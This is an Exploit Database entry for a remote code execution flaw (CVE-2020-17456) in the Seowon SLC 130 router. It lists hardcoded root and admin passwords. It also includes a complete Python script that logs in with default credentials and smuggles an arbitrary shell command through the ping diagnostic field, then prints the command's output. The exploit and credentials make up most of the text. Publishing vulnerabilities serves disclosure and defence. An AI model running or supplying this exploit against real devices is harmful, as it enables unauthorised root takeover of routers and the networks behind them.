Seowon SlC 130 Router – Remote Code Execution

• Exploit Database
• 16 阅读

• 作者： maj0rmil4d
  日期： 2020-08-21
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/48759/

• # Exploit Title: Seowon SlC 130 Router - Remote Code Execution
  # Author: maj0rmil4d - Ali Jalalat
  # Author website: https://secureguy.ir
  # Date: 2020-08-20
  # Vendor Homepage: seowonintech.co.kr
  # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
  # CVE: CVE-2020-17456
  # Version: Lync:Mac firmware 1.0.1, likely earlier versions
  # Tested on: Windows 10 - Parrot sec
  
  # Description:
  # user can run arbitrary commands on the router as root ! 
  # as there are already some hardcoded credentials so there is an easy to trigger exploit
  
  # credentials : 
  # user => VIP
  # pwd => V!P83869000
  
  # user => Root
  # pwd => PWDd0N~WH*4G#DN
  
  # user => root
  # pwd => gksrmf28
  
  # user => admin
  # pwd => admin
  # 
  
  # Awrite-up can be found at:
  # https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/
  
  import requests
  import sys
  
  host = sys.argv[1]
  
  session = requests.Session()
  
  header = { 
  
  "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
  "Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",
  "Accept-Language": "en-US,en;q:0.5",
  "Accept-Encoding": "gzip, deflate",
  "Content-Type": "pplication/x-www-form-urlencoded",
  "Content-Length": "132",
  "Origin": "http://192.168.1.1",
  "Connection": "close",
  "Referer": "http://192.168.1.1/",
  "Upgrade-Insecure-Requests": "1"
  }
  
  
  
  datas = {
  	
  	"Command":"Submit",
  	"expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",
  	"browserTime":"081119502020",
  	"currentTime":"1597159205",
  	"user":"admin",
  	"password":"admin"
  }
  
  
  #auth
  
  session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)
  
  #rce
  
  cmd = sys.argv[2]
  
  rce_data = {
  	
  	"Command":"Diagnostic",
  	"traceMode":"ping",
  	"reportIpOnly":"",
  	"pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,
  	"pingPktSize":"56",
  	"pingTimeout":"30",
  	"pingCount":"4",
  	"maxTTLCnt":"30",
  	"queriesCnt":"3",
  	"reportIpOnlyCheckbox":"on",
  	"btnApply":"Apply",
  	"T":"1597160664082"
  }
  
  rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)
  
  print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])